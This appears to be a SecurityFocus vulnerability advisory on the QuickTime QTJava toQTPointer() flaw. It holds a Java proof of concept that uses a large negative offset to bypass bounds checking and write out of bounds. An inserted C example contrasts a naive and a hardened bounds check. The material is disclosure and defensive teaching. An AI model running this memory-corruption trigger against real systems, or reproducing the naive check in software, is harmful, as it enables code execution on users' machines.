Apple Quicktime QTJava toQTPointer() Java Handling Arbitrary Code Execution Vulnerability

An exploit designed to leverage this issue was demonstrated as part of the CanSec Macbook Challenge, a competition to create a working exploit against a fully updated MacBook.

The following Java code demonstrates this issue by crashing affected browsers:

// Imports and the class/main() wrapper are added here so the snippet compiles
// stand-alone; the page's original code is the body of main().
import quicktime.QTException;
import quicktime.QTSession;
import quicktime.util.QTHandle;
import quicktime.util.QTPointerRef;

public class QTPointerCrash {
    public static void main(String[] args) throws QTException {
        // Initialize QT
        QTSession.open();

        // Get a handle to anything
        byte b[] = new byte[1 /*arbitrary*/];
        QTHandle h = new QTHandle(b);

        // Turn the handle into a pointer object. The
        // large negative value throws off bounds checking.
        QTPointerRef p = h.toQTPointer(-2000000000 /*off*/, 10 /*size*/);

        // Write to it.
        p.copyFromArray(0 /*offset*/, b /*source*/, 0, 1 /*length*/);
    }
}
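The bounds-check failure the comment above describes, as an added C example that is not part of the advisory or of QTJava's own code: a constructed handle (a buffer plus its length), a naive signed-arithmetic check of the kind a large negative offset slips past, and a hardened check beside it. The handle type and function names are hypothetical.

```c
#include <limits.h>
#include <stddef.h>
#include <stdio.h>

/* Constructed stand-in for a native handle: a buffer and its length. */
typedef struct { unsigned char *base; size_t len; } handle_t;

/* Naive check of the kind the advisory's negative offset defeats: with signed
 * arithmetic, offset + size for offset = -2000000000 and size = 10 is a large
 * negative number, so "end <= len" holds and a wild pointer would be handed out. */
int naive_in_bounds(int offset, int size, size_t len) {
    return (long long)offset + size <= (long long)len;
}

/* Hardened check: reject negative offset or size outright, then compare
 * without the possibility of overflow. */
int safe_in_bounds(int offset, int size, size_t len) {
    if (offset < 0 || size < 0) return 0;
    if ((size_t)offset > len) return 0;
    return (size_t)size <= len - (size_t)offset;
}

/* Returns a pointer into the handle only when [offset, offset+size) lies inside it. */
unsigned char *safe_to_pointer(const handle_t *h, int offset, int size) {
    if (!safe_in_bounds(offset, size, h->len)) return NULL;
    return h->base + offset;
}

int main(void) {
    unsigned char buf[1] = {0};           /* the one-byte handle from the PoC */
    handle_t h = { buf, sizeof buf };
    /* 1 = the naive check accepts the PoC's arguments; 0 = the hardened one rejects them */
    printf("naive: %d\n", naive_in_bounds(-2000000000, 10, h.len));
    printf("safe:  %d\n", safe_in_bounds(-2000000000, 10, h.len));
    return 0;
}
```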


UPDATE (October 22, 2007): An exploit update was released by Core Security for IMPACT v7. Users can obtain this update by selecting 'Get Updates' on the IMPACT Welcome Screen.
Copyright 2010, SecurityFocus